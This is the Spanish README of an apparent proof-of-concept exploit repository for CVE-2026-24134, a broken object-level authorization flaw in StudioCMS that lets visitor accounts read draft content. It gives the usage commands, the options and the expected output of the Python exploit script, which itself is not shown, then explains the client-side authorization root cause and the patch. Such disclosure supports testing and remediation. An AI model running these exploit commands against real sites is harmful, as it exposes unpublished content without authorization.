
Prueba de concepto del exploit para CVE-2026-24134, una vulnerabilidad de Autorización a Nivel de Objeto Rota en StudioCMS, que demuestra el acceso no autorizado a contenido en borrador.
Este repositorio contiene la Prueba de Concepto (PoC) para CVE-2026-24134, una vulnerabilidad de Autorización Rota a Nivel de Objeto (BOLA) en StudioCMS.
cve_2026_24134_poc.py - Script de explotación en Pythonpip install requests colorama
# Uso básico
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
# Guardar salida en archivo
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
--save
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--auto-test \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--editor-user editor01 \
--editor-pass editorpass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
-u, --url - URL base de StudioCMS objetivo--uuid - UUID del contenido borrador objetivo--username - Nombre de usuario para autenticación--password - Contraseña para autenticación--auto-test - Habilitar pruebas automatizadas--visitor-user - Nombre de usuario de la cuenta de visitante--visitor-pass - Contraseña de la cuenta de visitante--editor-user - Nombre de usuario de la cuenta de editor--editor-pass - Contraseña de la cuenta de editor--save - Guardar el contenido de la respuesta en un archivo--no-ssl-verify - Deshabilitar la verificación de certificados SSLpython3 cve_2026_24134_poc.py \
--url http://target.com \
--auto-test \
--visitor-user test_visitor \
--visitor-pass SecurePass123! \
--editor-user test_editor \
--editor-pass SecurePass456! \
--uuid 12345678-1234-1234-1234-123456789abc
Salida esperada si es vulnerable:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!
Salida esperada si está parcheado:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT
python3 cve_2026_24134_poc.py \
--url http://localhost:4321 \
--username attacker \
--password pass123 \
--uuid target-uuid-here \
--save
Esto guardará el contenido completo del borrador en draft_{uuid}.html.
[+] - Operación exitosa (verde)[*] - Mensaje informativo (azul)[!] - Advertencia (amarillo)[-] - Error (rojo)Si está ejecutando una versión vulnerable de StudioCMS, actualice inmediatamente a la versión parcheada.
El problema real: Las comprobaciones de autorización se realizaban en el lado del cliente (JavaScript), no en el servidor.
Según el equipo de desarrollo:
"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."
La solución: Mover la autorización del cliente al servidor.
Principio clave: Nunca confíe en el cliente. La seguridad del lado del cliente = mejora de la experiencia de usuario. La seguridad del lado del servidor = protección real.
IMPORTANTE: Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
Para preguntas sobre esta PoC o la vulnerabilidad:
Esta PoC se publica con fines educativos. Úsela de manera responsable y ética.